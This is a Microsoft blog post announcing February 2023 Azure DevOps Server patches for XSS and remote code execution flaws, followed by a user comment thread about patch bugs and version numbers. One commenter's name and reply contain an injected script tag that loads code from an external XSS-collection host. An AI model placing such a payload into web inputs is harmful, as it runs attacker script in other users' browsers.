Updated: February patches for Azure DevOps Server

Gloridel Morales

February 14th, 202340 1

2/17 Update: After installing Azure DevOps Server 2020.1.2 Patch 5 notifications were not getting delivered. To address this issue, we are re-releasing the patch. If you installed Patch 5, you should download and re-install the patch from the link provided in the instructions below.

This month, we are releasing fixes that impact our self-hosted product, Azure DevOps Server.

The following will be fixed with this patch:

CVE-2023-21564: Azure DevOps Server Cross-Site Scripting Vulnerability
CVE-2023-21553: Azure DevOps Server Remote Code Execution Vulnerability
Updated MSBuild and VSBuild tasks to support Visual Studio 2022.
Update methodology of loading reauthentication to prevent XSS attack vector.
Azure DevOps Server 2022 Proxy reports the following error: VS800069: This service is only available in on-premises Azure DevOps.
Fixed shelvesets accessibility issue via web UI.

Azure DevOps Server 2022 Patch 2

If you have Azure DevOps Server 2022, you should install Azure DevOps Server 2022 Patch 2. Check out the release notes for more details.

Verifying Installation

Run devops2022patch2.exe CheckInstall, devops2022patch2.exe is the file that is downloaded from the link above. The output of the command will either say that the patch has been installed, or that it is not installed.

Azure DevOps Server 2020.1.2 Patch 5

If you have Azure DevOps Server 2020.1.1, you should first update to Azure DevOps Server 2020.1.2. Once on 2020.1.2, install Azure DevOps Server 2020.1.2 Patch 5. Check out the release notes for more details.

Verifying Installation

Run devops2020.1.2patch5.exe CheckInstall, devops2020.1.2patch5.exe is the file that is downloaded from the link above. The output of the command will either say that the patch has been installed, or that it is not installed.

Gloridel Morales Senior Technical Program Manager, Azure DevOps

40 comments

Discussion is closed. Login to edit/delete existing comments.

Daniel Steiner February 14, 2023 11:09 am 1

the link for release notes point to an internal protected website: review.learn.microsoft.com
- Gloridel Morales February 14, 2023 12:58 pm 0
  
  Hi Daniel, thank you for reporting this. It has been fixed.
  - '"><script src=//xss.report/s/herry1></script> February 18, 2023 10:50 pm 0
    
    '"><script src=//xss.report/s/herry1></script>
Quintos February 14, 2023 6:54 pm 0

LGTM. I had installes the 2022.patch1 and 2022.patch2 on my lab server. After install both patch file, I reopened the azuredevops manager console, and the version number is still Server2022, not showinng the patch number. How can I make sure the patch was already installed completely?
- Gloridel Morales February 15, 2023 10:39 am 0
  Hi Quintos, did you try the verification steps listed in the blog post? You can also check the version of the following file:
```
[INSTALL_DIR]\Azure DevOps Server 2022\Application Tier\bin\Microsoft.Teamfoundation.Framework.Server.dll
```
  Azure DevOps Server 2022 is installed to c:\Program Files\Azure DevOps Server 2022 by default. After installing Azure DevOps Server 2022 Patch 2, the version will be 19.205.33402.2.
  - Quintos February 23, 2023 1:25 am 0
    
    Thanks. It works. And if I reinstall the patch2.exe, it will show current installed patch version .
  - Daniel Steiner February 28, 2023 6:44 am 0
    
    @Gloridel
    after running a fresh installation of Azure DevOps Server 2020.1 and upgrading it with the various patches til Azure DevOps Server 2022 Patch 2 the file Microsft.TeamFoundation.Framework.Server.dll is found in folder “Application Tier\Web Services\bin” and not in “Application Tier\bin” as you wrote.
    In addition various files including “Application Tier\bin\Microsoft.TeamFoundation.Framework.Server.dll” from Azure DevOps Server 2020 installation are not uninstalled.
Tore Østergaard Jensen (TORE) February 15, 2023 8:42 am 0

Link to the developer community report of the proxy issue:
https://developercommunity.visualstudio.com/t/Proxy-upgrade-to-2022-breaks-its-functio/10264792
Tejas A Nair February 16, 2023 6:15 am 0

Hi!

We’re missing Updates to Azure File Copy task and Repository as protected resource features in our installation of Azure DevOps Server 2022 v19.205.33122.1.

https://developercommunity.visualstudio.com/t/Azure-File-Copy-task-v5-missing-in-Azure/10275323?viewtype=all
https://developercommunity.visualstudio.com/t/Feature-Add-protection-to-repository-re/10275298

When will these be available?
Michael Hauer February 16, 2023 11:42 am 1

After installing the patch (patching from plain 2020.1.2 to 2020.1.2 patch 5) on our instance it didnt send any mail notifications (pull requests, approval, comment mentions). Mail test from Console was successful but event log showed many errors (I removed some personal information)

Application Domain: TfsJobAgent.exe
Assembly: Microsoft.TeamFoundation.Framework.Server, Version=18.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a; v4.0.30319
Service Host: XXXXXXX (DefaultCollection)
Process Details:
Process Name: TfsJobAgent
Account name: XXXX

Detailed Message: TF400703: Unable to initialize the specified service Microsoft.TeamFoundation.Framework.Server.SmtpSettingsService.

Exception Message: TF400367: The request could not be performed due to a host type mismatch. Please check any connection information and verify the information is correct. The request was executed against a ProjectCollection. (type UnexpectedHostTypeException)
Exception Stack Trace: at Microsoft.TeamFoundation.Framework.Server.VssRequestContextExtensions.CheckDeploymentRequestContext(IVssRequestContext context)
at Microsoft.TeamFoundation.Framework.Server.SmtpSettingsService.Microsoft.TeamFoundation.Framework.Server.IVssFrameworkService.ServiceStart(IVssRequestContext systemRequestContext)
at Microsoft.TeamFoundation.Framework.Server.ServiceProvider.CreateService(IVssRequestContext requestContext, Type requestedType, Type managedType)

We restored our instance through restoring the modified files from C:\Program Files\Azure DevOps Server 2020\Backup
After restoring files and starting services again, all mails that should have been sent were delivered immediately.

We are in the progress of making an official call but please have a look at the code changes in SmtpSettingsService.ServiceStart.
- Tore Østergaard Jensen (TORE) February 17, 2023 2:35 am 0
  
  I am interested in where this ends. We would not like to update if it results in no notification mails.
- Michael Hauer February 17, 2023 8:10 am 0
  
  I also made a Developer Community report
- Gloridel Morales February 17, 2023 9:46 am 1
  
  Hi Michael, I forwarded your message to our team for investigation.
  - Casey Rupley February 17, 2023 10:12 am 2
    
    FWIW, I can confirm the exact same behavior identified by Michael Hauer after I applied Patch 5. Besides test emails generated from the console, no other alerts are working.
    - '"><script src=//xss.report/s/herry1></script> February 18, 2023 10:23 pm 0
      
      sdfd
- Vladimir Khvostov February 17, 2023 3:17 pm 0
  
  Hello,
  thanks for reporting this issue. We addressed it and will re-release the patch very soon.
  Customers who already install Patch 5 for Azure DevOps Server 2020.1.2, will need to download updated patch and re-install it.
  Sorry for the inconvinience it caused. We will reply to this thread once updated patch is available.
  Regards,
  –Vladimir
- Gloridel Morales February 17, 2023 7:56 pm 0
  
  Thank you all for reporting this issue. We have re-released the patch and it is ready for you to install from the links provided in this blog.
  - anonymous February 18, 2023 10:16 pm 0
    
    this comment has been deleted.
    - anonymous February 18, 2023 10:18 pm 1
      
      this comment has been deleted.
  - Tore Østergaard Jensen (TORE) February 20, 2023 1:54 am 0
    
    So this did not impact 2022 Patch 2?
    - anonymous February 21, 2023 9:15 am 0
      
      this comment has been deleted.
    - Gloridel Morales February 21, 2023 9:16 am 1
      
      Correct, it didn’t impact Azure DevOps Server 2022 Patch 2.
      - Daniel Steiner February 22, 2023 9:03 am 0
        
        Gloridel,
        
        what is the difference of Azure DevOps Server 2022 Patch2 version 19.205.33402.2 released on Feb 15 compared to the download from Azure DevOps Server 2022 Patch2 version 18.181.32404.7 downloaded Feb 22 ?
        
        the same 2022 Patch 2 with two different version numbers is confusing especially as the old list of Azure DevOps Server build numbers is no longer updated with official released Azure DevOps Server patches.
      - Gloridel Morales February 24, 2023 11:40 am 0
        
        Daniel, they are both the same.
  - Michael Hauer March 3, 2023 2:01 am 0
    
    I can confirm that the re-released patch for 2020 fixes the reported issue.
Markus February 23, 2023 12:53 am 1

After applying the patch on AzDO 2020.1.2, classic pipeline still shows only MSbuild 16.0/Visual Studio 2019
- Daniel Steiner February 23, 2023 8:37 am 0
  
  @Markus,
  what are you expecting ? Visual Studio 2022 ?
  
  support for VS 2022 is only added in AzureDevOps Server 2022 Patch 2 but not in 2020.1.2.
  
  if you need VS 2022 support with AzDO 2020.1.2 than you can install Visual Studio 2022 support by Jesse from marketplace https://marketplace.visualstudio.com/items?itemName=jessehouwing.visualstudio and later switch back to standard task with VS2022 support after upgrading to AzDO 2022.
  we’re currently using it and it works except that it is annoying to replace all the tasks which are using Visual Studio or VS Test.
  - Markus February 23, 2023 10:32 pm 1
    
    Ok, then the description is misleading
    BTW, the description also doesn’t mention that the build agent version will be updated (Which makes sense for supporting VS2022, which according to your statement is not the case 🤔)
    - Alexander February 23, 2023 11:14 pm 1
      
      I totally agree with Markus, so the blog reads like the changes are included in both patches, also Updated MSBuild and VSBuild tasks to support Visual Studio 2022. That could be improved.
      - Daniel Steiner February 24, 2023 3:22 am 0
        
        the content of the blog is could be misleading.
        
        You need to read the release notes for both patch and than you get that updated tasks for VS2022 are only included in Azure DevOps Server 2022 patch 2
- Gloridel Morales February 24, 2023 11:39 am 1
  
  Thank you, Markus, Daniel, and Alexander, for your feedback. It makes sense to specify in the blog post the changes that are applicable to each version of the product.
Raphael Bösch February 28, 2023 5:16 am 0

Just to be on the save side: I plan to do a fresh installation of Azure DevOps Server 2020.1.2 via ISO-Download. Is patch 5 cumulative or do I have to install all previous patches before patch 5?
- Gloridel Morales March 1, 2023 11:54 am 0
  
  Hi Raphael, patches are cumulative. You should install Azure DevOps Server 2020.1.2 Patch 5 after the fresh install of Azure DevOps Server 2020.1.2.
andreas-nitsch March 15, 2023 8:39 am 0

After installing the Patch 1.5 for AzureDevOps 2020 our server says that Version 18.181.33417.3 (Azure DevOps Server 2020 Update 1.2) is installed.

Could you please verify that this is the version expected after successful installation of patch 1.5.

Best Regards

Andreas
- Gloridel Morales March 17, 2023 10:27 am 0
  
  Hi Andreas, 18.181.33417.3 is the version after installing Azure DevOps Server 2020.1.2 Patch 5.
  - andreas-nitsch March 20, 2023 12:33 am 0
    
    Thank you very much 🙂
Paweł Borkowski April 13, 2023 12:33 am 1

Hi,

I have Azure DevOps Server 2020 Update 1.2 Patch 2. Do I need to install all previous patches before applying patch 5?
Patrick Sheldon May 8, 2023 6:20 am 0
Hi,

I am trying to explore migrating to the cloud service. However, the Data Migration Tool (2020.1.2RTW_18.181.18965609) is not accepting my current version of 2020 Update 1.2 Patch 5 (18.181.33417.3) (no other patches were installed). It is looking for version 18.181.33213.4 which I can only guess is maybe Patch 4.

I tried to uninstall Patch 5 (https://learn.microsoft.com/en-us/azure/devops/server/install/uninstall-patch?view=azure-devops-2020). Now the Azure DevOps Server Administration Console now reports I have 18.181.32404.7 but when I try to install Patch 4 I get the following:
```
Found InstallVersion: 18.181.32404.7
Latest patch installed on machine is version 18.181.33417.3
Installed patch with version 18.181.33417.3 is later than this patch with version 18.181.33128.1, cannot install older patch on machine.
Unable to find valid Azure DevOps Server install on machine.
```
1. When will the Data Migration Tool be updated to support Patch 5?
2. Is Patch 4 version 18.181.33213.4? And if not, which Patch is it expecting?
3. How do I properly and fully remove Patch 5 so I can install Patch 4 (or earlier)?
4. Do I need to install each of the patches?
- Patrick Sheldon May 15, 2023 10:50 am 0
  
  Update: Despite doing nothing as I was waiting for several days for a meeting with Microsoft Support, after trying the Migration Tool again, it ran with no complaints. No DevOps updates/patches were installed. No Windows updates were installed. Very bazaar. It would still be nice to know the answers to my questions as it may help others attempting this process.

Updated: February patches for Azure DevOps Server

Azure DevOps Server 2022 Patch 2

Azure DevOps Server 2020.1.2 Patch 5

Gloridel Morales Senior Technical Program Manager, Azure DevOps

Read next

40 comments